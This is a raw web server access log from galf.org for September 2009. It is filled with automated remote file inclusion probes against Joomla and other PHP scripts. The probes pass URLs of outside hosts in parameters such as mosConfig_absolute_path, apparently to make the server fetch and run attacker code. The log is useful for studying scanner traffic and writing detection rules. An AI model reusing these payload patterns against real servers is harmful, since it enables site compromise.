61.135.134.78 - - [28/Sep/2009:00:26:39 -0700] "GET /extadminmenus.class.php?mosConfig_absolute_path=http://www.ssp.co.id/admin/admin/id1old?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
61.135.134.78 - - [28/Sep/2009:00:26:39 -0700] "GET /logs//extadminmenus.class.php?mosConfig_absolute_path=http://www.ssp.co.id/admin/admin/id1old?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
61.135.134.78 - - [28/Sep/2009:00:26:49 -0700] "GET /logs/access_090309.log//extadminmenus.class.php?mosConfig_absolute_path=http://www.ssp.co.id/admin/admin/id1old?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
125.251.142.142 - - [28/Sep/2009:00:28:37 -0700] "GET /logs/access_090420.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.rucoc.com/pepek.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
204.15.230.189 - - [28/Sep/2009:00:30:03 -0700] "GET /class.dashboard_cms.php?where_framework=http://iad4151.co.kr/cgi/data/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
204.15.230.189 - - [28/Sep/2009:00:30:03 -0700] "GET /class.dashboard_cms.php?where_framework=http://iad4151.co.kr/cgi/data/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
206.225.23.4 - - [28/Sep/2009:00:30:56 -0700] "GET /logs/access.log//class.dashboard_cms.php?where_framework=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
206.225.23.4 - - [28/Sep/2009:00:30:56 -0700] "GET /logs/access_090420.log//class.dashboard_cms.php?where_framework=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
206.225.23.4 - - [28/Sep/2009:00:30:56 -0700] "GET /class.dashboard_cms.php?where_framework=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
206.225.23.4 - - [28/Sep/2009:00:30:56 -0700] "GET /logs//class.dashboard_cms.php?where_framework=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
61.135.134.78 - - [28/Sep/2009:00:31:22 -0700] "GET /logs/access.log%20%20//registration_detailed.inc.php?mosConfig_absolute_path=http://www.ssp.co.id/admin/admin/id1old?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
61.135.134.78 - - [28/Sep/2009:00:31:22 -0700] "GET /registration_detailed.inc.php?mosConfig_absolute_path=http://www.ssp.co.id/admin/admin/id1old?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
61.135.134.78 - - [28/Sep/2009:00:31:22 -0700] "GET /logs//registration_detailed.inc.php?mosConfig_absolute_path=http://www.ssp.co.id/admin/admin/id1old?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
61.135.134.215 - - [28/Sep/2009:00:31:38 -0700] "GET /logs//registration_detailed.inc.php?mosConfig_absolute_path=http://www.ssp.co.id/admin/admin/id1old?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
61.135.134.215 - - [28/Sep/2009:00:31:38 -0700] "GET /logs/access.log%20%20//registration_detailed.inc.php?mosConfig_absolute_path=http://www.ssp.co.id/admin/admin/id1old?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
61.135.134.215 - - [28/Sep/2009:00:31:38 -0700] "GET /registration_detailed.inc.php?mosConfig_absolute_path=http://www.ssp.co.id/admin/admin/id1old?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
61.135.134.78 - - [28/Sep/2009:00:32:50 -0700] "GET /logs//registration_detailed.inc.php?mosConfig_absolute_path=http://www.ssp.co.id/admin/admin/id1old?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
61.135.134.78 - - [28/Sep/2009:00:32:50 -0700] "GET /logs/access_090511.log//registration_detailed.inc.php?mosConfig_absolute_path=http://www.ssp.co.id/admin/admin/id1old?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
61.135.134.78 - - [28/Sep/2009:00:32:50 -0700] "GET /registration_detailed.inc.php?mosConfig_absolute_path=http://www.ssp.co.id/admin/admin/id1old?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
61.135.134.215 - - [28/Sep/2009:00:33:10 -0700] "GET /registration_detailed.inc.php?mosConfig_absolute_path=http://www.ssp.co.id/admin/admin/id1old?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
61.135.134.215 - - [28/Sep/2009:00:33:10 -0700] "GET /logs//registration_detailed.inc.php?mosConfig_absolute_path=http://www.ssp.co.id/admin/admin/id1old?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
61.135.134.215 - - [28/Sep/2009:00:33:10 -0700] "GET /logs/access_090511.log//registration_detailed.inc.php?mosConfig_absolute_path=http://www.ssp.co.id/admin/admin/id1old?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.101.214.54 - - [28/Sep/2009:00:33:52 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.zytologie.de//id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.101.214.54 - - [28/Sep/2009:00:33:52 -0700] "GET /logs/access_090420.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.zytologie.de//id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.101.214.54 - - [28/Sep/2009:00:33:52 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.zytologie.de//id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.236.47.182 - - [28/Sep/2009:00:33:53 -0700] "GET /logs/access_090525.log//newspublish/include.php?path[docroot]=http://www.sportsedu.net/zboard/data/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
61.135.134.215 - - [28/Sep/2009:00:33:53 -0700] "GET /logs/access_090601.log//registration_detailed.inc.php?mosConfig_absolute_path=http://www.ssp.co.id/admin/admin/id1old?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
61.135.134.78 - - [28/Sep/2009:00:33:55 -0700] "GET /logs/access_090601.log//registration_detailed.inc.php?mosConfig_absolute_path=http://www.ssp.co.id/admin/admin/id1old?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
203.185.129.36 - - [28/Sep/2009:00:34:09 -0700] "GET /logs/access_090323.log//extadminmenus.class.php?mosConfig_absolute_path=http://www.ssp.co.id/admin/admin/id1old??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
203.185.129.36 - - [28/Sep/2009:00:34:09 -0700] "GET /logs/access_090309.log//extadminmenus.class.php?mosConfig_absolute_path=http://www.ssp.co.id/admin/admin/id1old??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
203.185.129.36 - - [28/Sep/2009:00:34:09 -0700] "GET /logs//extadminmenus.class.php?mosConfig_absolute_path=http://www.ssp.co.id/admin/admin/id1old??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
203.185.129.36 - - [28/Sep/2009:00:34:09 -0700] "GET /extadminmenus.class.php?mosConfig_absolute_path=http://www.ssp.co.id/admin/admin/id1old??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
61.135.134.215 - - [28/Sep/2009:00:34:19 -0700] "GET /logs//registration_detailed.inc.php?mosConfig_absolute_path=http://www.ssp.co.id/admin/admin/id1old?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
61.135.134.215 - - [28/Sep/2009:00:34:19 -0700] "GET /registration_detailed.inc.php?mosConfig_absolute_path=http://www.ssp.co.id/admin/admin/id1old?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
61.135.134.215 - - [28/Sep/2009:00:34:24 -0700] "GET /logs/access_090420.log//registration_detailed.inc.php?mosConfig_absolute_path=http://www.ssp.co.id/admin/admin/id1old?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.236.47.182 - - [28/Sep/2009:00:34:33 -0700] "GET /logs/access_090720.log//newspublish/include.php?path[docroot]=http://www.sportsedu.net/zboard/data/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.206.120.161 - - [28/Sep/2009:00:34:37 -0700] "GET /logs/access.log//class.dashboard_cms.php?where_framework=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
211.206.120.161 - - [28/Sep/2009:00:34:37 -0700] "GET /class.dashboard_cms.php?where_framework=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
211.206.120.161 - - [28/Sep/2009:00:34:37 -0700] "GET /logs//class.dashboard_cms.php?where_framework=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
222.236.47.182 - - [28/Sep/2009:00:34:56 -0700] "GET /logs/access_090720.log//newspublish/include.php?path[docroot]=http://forum.sleptonmusic.com/upload/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.236.47.182 - - [28/Sep/2009:00:34:57 -0700] "GET /logs/access_090525.log//newspublish/include.php?path[docroot]=http://forum.sleptonmusic.com/upload/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
61.135.134.215 - - [28/Sep/2009:00:35:11 -0700] "GET /logs//registration_detailed.inc.php?mosConfig_absolute_path=http://www.ssp.co.id/admin/admin/id1old?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
61.135.134.215 - - [28/Sep/2009:00:35:11 -0700] "GET /logs/access.log//registration_detailed.inc.php?mosConfig_absolute_path=http://www.ssp.co.id/admin/admin/id1old?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
61.135.134.215 - - [28/Sep/2009:00:35:11 -0700] "GET /registration_detailed.inc.php?mosConfig_absolute_path=http://www.ssp.co.id/admin/admin/id1old?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
121.101.214.54 - - [28/Sep/2009:00:35:23 -0700] "GET /logs/access.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.zytologie.de//id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.101.214.54 - - [28/Sep/2009:00:35:36 -0700] "GET /logs/access_090420.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.zytologie.de//id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.206.120.161 - - [28/Sep/2009:00:36:01 -0700] "GET /logs/access.log//class.dashboard_cms.php?where_framework=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
211.206.120.161 - - [28/Sep/2009:00:36:01 -0700] "GET /logs//class.dashboard_cms.php?where_framework=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "galf.org"
211.206.120.161 - - [28/Sep/2009:00:36:01 -0700] "GET /class.dashboard_cms.php?where_framework=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "galf.org"
114.4.8.14 - - [28/Sep/2009:00:36:19 -0700] "GET /logs/access_090831.log//errors.php?error=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
65.55.207.51 - - [28/Sep/2009:00:36:23 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
61.100.5.136 - - [28/Sep/2009:00:36:34 -0700] "GET /logs/access.log//class.dashboard_cms.php?where_framework=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
61.100.5.136 - - [28/Sep/2009:00:36:34 -0700] "GET /logs//class.dashboard_cms.php?where_framework=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
61.100.5.136 - - [28/Sep/2009:00:36:34 -0700] "GET /class.dashboard_cms.php?where_framework=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
61.100.5.136 - - [28/Sep/2009:00:36:34 -0700] "GET /class.dashboard_cms.php?where_framework=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
204.15.230.189 - - [28/Sep/2009:00:36:50 -0700] "GET /logs/access.log//class.dashboard_cms.php?where_framework=http://iad4151.co.kr/cgi/data/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
204.15.230.189 - - [28/Sep/2009:00:36:50 -0700] "GET /class.dashboard_cms.php?where_framework=http://iad4151.co.kr/cgi/data/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
204.15.230.189 - - [28/Sep/2009:00:36:51 -0700] "GET /logs//class.dashboard_cms.php?where_framework=http://iad4151.co.kr/cgi/data/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
204.15.230.189 - - [28/Sep/2009:00:37:08 -0700] "GET /class.dashboard_cms.php?where_framework=http://iad4151.co.kr/cgi/data/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
204.15.230.189 - - [28/Sep/2009:00:37:08 -0700] "GET /logs//class.dashboard_cms.php?where_framework=http://iad4151.co.kr/cgi/data/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
203.185.129.36 - - [28/Sep/2009:00:37:27 -0700] "GET /registration_detailed.inc.php?mosConfig_absolute_path=http://www.ssp.co.id/admin/admin/id1old??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
203.185.129.36 - - [28/Sep/2009:00:37:30 -0700] "GET /logs/access.log%20%20//registration_detailed.inc.php?mosConfig_absolute_path=http://www.ssp.co.id/admin/admin/id1old??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
203.185.129.36 - - [28/Sep/2009:00:37:30 -0700] "GET /logs//registration_detailed.inc.php?mosConfig_absolute_path=http://www.ssp.co.id/admin/admin/id1old??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
129.215.82.1 - - [28/Sep/2009:00:37:33 -0700] "GET /logs/access_090713.log%20%20/index.php?principal=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
129.215.82.1 - - [28/Sep/2009:00:37:33 -0700] "GET /index.php?principal=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
129.215.82.1 - - [28/Sep/2009:00:37:33 -0700] "GET /logs/access_090629.log%20%20/index.php?principal=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
129.215.82.1 - - [28/Sep/2009:00:37:33 -0700] "GET /logs/index.php?principal=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
61.100.5.136 - - [28/Sep/2009:00:37:33 -0700] "GET /logs/access_090420.log//class.dashboard_cms.php?where_framework=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
61.100.5.136 - - [28/Sep/2009:00:37:34 -0700] "GET /logs//class.dashboard_cms.php?where_framework=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.101.214.54 - - [28/Sep/2009:00:37:39 -0700] "GET /logs/access.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.zytologie.de//id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.202.2.64 - - [28/Sep/2009:00:38:15 -0700] "GET /logs/access_090720.log//newspublish/include.php?path[docroot]=http://ngelitik.org/cyberirc/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.202.2.64 - - [28/Sep/2009:00:38:15 -0700] "GET /logs/access_090525.log//newspublish/include.php?path[docroot]=http://ngelitik.org/cyberirc/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
203.185.129.36 - - [28/Sep/2009:00:38:20 -0700] "GET /logs/access.log/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.ssp.co.id/admin/admin/id1old??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
129.215.82.1 - - [28/Sep/2009:00:39:23 -0700] "GET /logs/access_090629.log/index.php?principal=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
72.30.65.44 - - [28/Sep/2009:00:39:35 -0700] "GET / HTTP/1.0" 200 1032 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
61.135.134.78 - - [28/Sep/2009:00:39:54 -0700] "GET /registration_detailed.inc.php?mosConfig_absolute_path=http://www.ssp.co.id/admin/admin/id1old?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
61.135.134.78 - - [28/Sep/2009:00:39:54 -0700] "GET /logs//registration_detailed.inc.php?mosConfig_absolute_path=http://www.ssp.co.id/admin/admin/id1old?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
61.135.134.78 - - [28/Sep/2009:00:40:00 -0700] "GET /logs/access_090420.log//registration_detailed.inc.php?mosConfig_absolute_path=http://www.ssp.co.id/admin/admin/id1old?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
129.215.82.1 - - [28/Sep/2009:00:40:08 -0700] "GET /logs/access_090713.log/index.php?principal=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
125.251.142.142 - - [28/Sep/2009:00:40:23 -0700] "GET /logs//include.php?path[docroot]=http://www.psgkorea.com/bbs/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
125.251.142.142 - - [28/Sep/2009:00:40:24 -0700] "GET /logs/access.log%20%20//include.php?path[docroot]=http://www.psgkorea.com/bbs/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
125.251.142.142 - - [28/Sep/2009:00:40:24 -0700] "GET /include.php?path[docroot]=http://www.psgkorea.com/bbs/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
61.135.134.78 - - [28/Sep/2009:00:40:58 -0700] "GET /logs/access.log//registration_detailed.inc.php?mosConfig_absolute_path=http://www.ssp.co.id/admin/admin/id1old?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
61.135.134.78 - - [28/Sep/2009:00:40:58 -0700] "GET /registration_detailed.inc.php?mosConfig_absolute_path=http://www.ssp.co.id/admin/admin/id1old?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
61.135.134.78 - - [28/Sep/2009:00:40:58 -0700] "GET /logs//registration_detailed.inc.php?mosConfig_absolute_path=http://www.ssp.co.id/admin/admin/id1old?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
65.55.207.51 - - [28/Sep/2009:00:41:03 -0700] "GET / HTTP/1.1" 200 1048 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
211.115.89.7 - - [28/Sep/2009:00:41:31 -0700] "GET /logs/access.log%20%20//include.php?path[docroot]=http://www.psgkorea.com/bbs/id1.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "galf.org"
211.115.89.7 - - [28/Sep/2009:00:41:31 -0700] "GET /logs//include.php?path[docroot]=http://www.psgkorea.com/bbs/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
211.115.89.7 - - [28/Sep/2009:00:41:32 -0700] "GET /include.php?path[docroot]=http://www.psgkorea.com/bbs/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
204.15.230.189 - - [28/Sep/2009:00:44:46 -0700] "GET /errors.php?error=http://iad4151.co.kr/cgi/data/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
204.15.230.189 - - [28/Sep/2009:00:44:47 -0700] "GET /errors.php?error=http://iad4151.co.kr/cgi/data/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
206.225.23.4 - - [28/Sep/2009:00:45:34 -0700] "GET /errors.php?error=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
206.225.23.4 - - [28/Sep/2009:00:45:34 -0700] "GET /logs//errors.php?error=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
206.225.23.4 - - [28/Sep/2009:00:45:34 -0700] "GET /logs/access_090420.log%20%20//errors.php?error=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.130.29.11 - - [28/Sep/2009:00:46:00 -0700] "GET /?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
121.130.29.11 - - [28/Sep/2009:00:46:00 -0700] "GET /logs/access_090316.log%20%20//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.130.29.11 - - [28/Sep/2009:00:46:00 -0700] "GET /logs//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "www.galf.org"
206.225.23.4 - - [28/Sep/2009:00:46:35 -0700] "GET /logs/access.log%20%20//errors.php?error=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
206.225.23.4 - - [28/Sep/2009:00:46:35 -0700] "GET /logs//errors.php?error=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
206.225.23.4 - - [28/Sep/2009:00:46:35 -0700] "GET /errors.php?error=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
211.115.89.7 - - [28/Sep/2009:00:48:11 -0700] "GET /logs/access.log//include.php?path[docroot]=http://www.psgkorea.com/bbs/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
218.27.203.107 - - [28/Sep/2009:00:48:29 -0700] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://feedbee.com/support/wpThumbnails/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.27.203.107 - - [28/Sep/2009:00:48:31 -0700] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://feedbee.com/support/wpThumbnails/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.27.203.107 - - [28/Sep/2009:00:48:37 -0700] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://feedbee.com/support/wpThumbnails/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.27.203.107 - - [28/Sep/2009:00:48:37 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://feedbee.com/support/wpThumbnails/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.27.203.107 - - [28/Sep/2009:00:48:39 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://feedbee.com/support/wpThumbnails/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.27.203.107 - - [28/Sep/2009:00:48:39 -0700] "GET /logs/access_090601.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://feedbee.com/support/wpThumbnails/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.27.203.107 - - [28/Sep/2009:00:48:39 -0700] "GET /logs/access_090601.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://feedbee.com/support/wpThumbnails/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.27.203.107 - - [28/Sep/2009:00:48:39 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://feedbee.com/support/wpThumbnails/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.130.29.11 - - [28/Sep/2009:00:48:42 -0700] "GET /logs/access_090316.log//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.27.203.107 - - [28/Sep/2009:00:48:47 -0700] "GET /logs/access_090601.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://feedbee.com/support/wpThumbnails/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.27.203.107 - - [28/Sep/2009:00:49:02 -0700] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://feedbee.com/support/wpThumbnails/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.27.203.107 - - [28/Sep/2009:00:49:03 -0700] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://feedbee.com/support/wpThumbnails/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.27.203.107 - - [28/Sep/2009:00:49:03 -0700] "GET /logs/access_090601.log%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://feedbee.com/support/wpThumbnails/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.27.203.107 - - [28/Sep/2009:00:49:03 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://feedbee.com/support/wpThumbnails/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.27.203.107 - - [28/Sep/2009:00:49:12 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://feedbee.com/support/wpThumbnails/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.27.203.107 - - [28/Sep/2009:00:49:12 -0700] "GET /logs/access_090601.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://feedbee.com/support/wpThumbnails/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.27.203.107 - - [28/Sep/2009:00:50:27 -0700] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://feedbee.com/support/wpThumbnails/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.27.203.107 - - [28/Sep/2009:00:50:27 -0700] "GET /logs/access_090601.log%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://feedbee.com/support/wpThumbnails/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.27.203.107 - - [28/Sep/2009:00:50:27 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://feedbee.com/support/wpThumbnails/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.27.203.107 - - [28/Sep/2009:00:50:34 -0700] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://feedbee.com/support/wpThumbnails/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.27.203.107 - - [28/Sep/2009:00:50:34 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://feedbee.com/support/wpThumbnails/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.27.203.107 - - [28/Sep/2009:00:50:34 -0700] "GET /logs/access_090601.log%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://feedbee.com/support/wpThumbnails/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.27.203.107 - - [28/Sep/2009:00:51:09 -0700] "GET /logs/access_090601.log%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://feedbee.com/support/wpThumbnails/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
